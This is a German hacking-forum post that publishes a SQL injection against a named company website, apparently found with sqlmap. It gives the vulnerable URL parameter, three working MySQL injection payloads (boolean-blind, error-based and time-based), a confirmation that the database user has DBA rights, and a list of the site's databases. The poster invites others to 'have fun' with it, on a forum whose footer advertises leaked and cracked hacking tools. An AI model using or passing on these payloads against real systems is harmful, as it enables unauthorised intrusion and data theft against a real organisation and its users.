Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

[SQLi] www.dfrobot.com

- - - - -

  • Please log in to reply
No replies to this topic

#1
Klaus

Klaus

    Hacktivist

  • Banned
  • PipPipPipPipPip
  • Likes
    34
  • 59 posts
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Target: 

Please Login HERE or Register HERE to see this link!

(GET)

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=DFblog/blog&id=56' AND 6035=6035-- HGhT

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: route=DFblog/blog&id=56' AND (SELECT 2381 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(2381=2381,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DUJQ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: route=DFblog/blog&id=56' AND SLEEP(5)-- euLJ
---
back-end DBMS: MySQL >= 5.0
current user is DBA:    True
---
back-end DBMS: MySQL >= 5.0
available databases [10]:
[*] df_forum
[*] df_forumv2
[*] df_opencartv1
[*] df_opencartv3
[*] df_wikiv2
[*] df_wikiv3
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

Viel Spaß! 


  • SecurityFlaw likes this




This topic has been visited by 44 user(s)


    3eyes, abuleyla, Bot4ng, clusterhead, cruzz, cyberbitch, dvalar, Framerater, Franziskaner, G4miT, h04x, hlaus777, kiwitone, Klaus, Kraenk, LiquidBlue, loken, lolorollo, loziov1, m0rph75, MarkSantos, matad0r, mesagio, minchemuj, Mini Rick, most_uniQue, Mr_NiceGuy, notfound, pekelhc, pi^2, ProHex, Pseudo, python_snippet, SavE1, SecurityFlaw, Smokyjoe, stoneserv, twixeis, w0tan, xcrimeex, xFAUSTx, xrahitel, xVirtu, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.